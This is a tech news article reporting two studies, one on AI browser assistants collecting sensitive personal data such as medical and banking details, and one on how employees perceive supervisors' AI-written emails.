Artificial intelligence is now baked into web browsing and workplace communication. From AI-powered browsers that help with searches to chatbots drafting work emails, these tools promise efficiency. But a closer look reveals that many come with a privacy cost and even workplace trust issues. A pair of recent studies shows how these technologies collect sensitive information and affect professional credibility in surprising ways.
What’s Happening & Why This Matters
AI browsers record — a lot!
Researchers from the United Kingdom and Italy tested 10 popular AI-powered browsers, including OpenAI’s ChatGPT, Microsoft’s Copilot, and Merlin AI for Chrome. They found that almost all, except Perplexity AI, tracked sensitive data. The discovery included medical records, bank details, and even social security numbers.
The study revealed that some assistants, such as Merlin and Sider, didn’t stop tracking even in private spaces like health portals or online banking pages. In several cases, they transmitted the full webpage content to their servers. Merlin also captured users’ tax information in the United States.
Other extensions, like Sider and TinaMind, passed user prompts and identifiable information, such as IP addresses, to Google Analytics, enabling cross-site tracking and ad targeting. Meanwhile, tools like Google’s own integration, Copilot, and Sider allowed ChatGPT to infer details such as a user’s age, gender, and income to personalise responses.
According to Anna Maria Mandalari, senior author and assistant professor at University College London, these assistants “operate with unprecedented access to users’ online behaviour … often at the cost of user privacy.”
The researchers believe that these practices may breach U.S. privacy laws on health data and EU GDPR rules governing personal data usage. Privacy policies confirm that many of these services collect user details, transaction history, and prompts for personalisation and legal compliance.
In the office, AI can hurt trust
A separate study, published in the International Journal of Business Communication, explored how AI-written work emails are perceived. Over 1,000 U.S. professionals were shown emails supposedly written by either themselves or their supervisors, with varying levels of AI assistance.
The results were telling. While people viewed their AI-assisted writing favorably, they judged supervisors’ AI use more harshly. Only 40% of employees found high-AI-use supervisor emails sincere, compared to 83% for low-AI-use ones. The perception gap grew as AI assistance expanded from grammar checks to complete drafting.
Anthony Coman from the University of Florida, one of the study’s authors, noted that “AI-assisted writing can undermine perceptions of traits linked to a supervisor’s trustworthiness.” Employees were more forgiving when AI was used for purely informative messages. But for relationship-driven or motivational emails, heavy AI use reduced credibility.
The Grand Scheme of Things
Together, these findings show that AI’s integration into daily life is not risk-free. Browser assistants may compromise personal privacy, and workplace AI use can damage trust. Both issues require more transparency from tech providers and a nuanced understanding of when and how to deploy AI tools.
TF Summary: What’s Next
For users, awareness is the first defence. AI browsers and chatbots should be treated with the same caution as any service that collects personal data. Expect regulators to examine compliance with GDPR and U.S. privacy laws, especially as AI becomes embedded in everyday tasks. In the workplace, leaders should balance efficiency gains with the need to maintain trust. Limiting AI use in sensitive communications could help preserve credibility.
— Text-to-Speech (TTS) provided by gspeech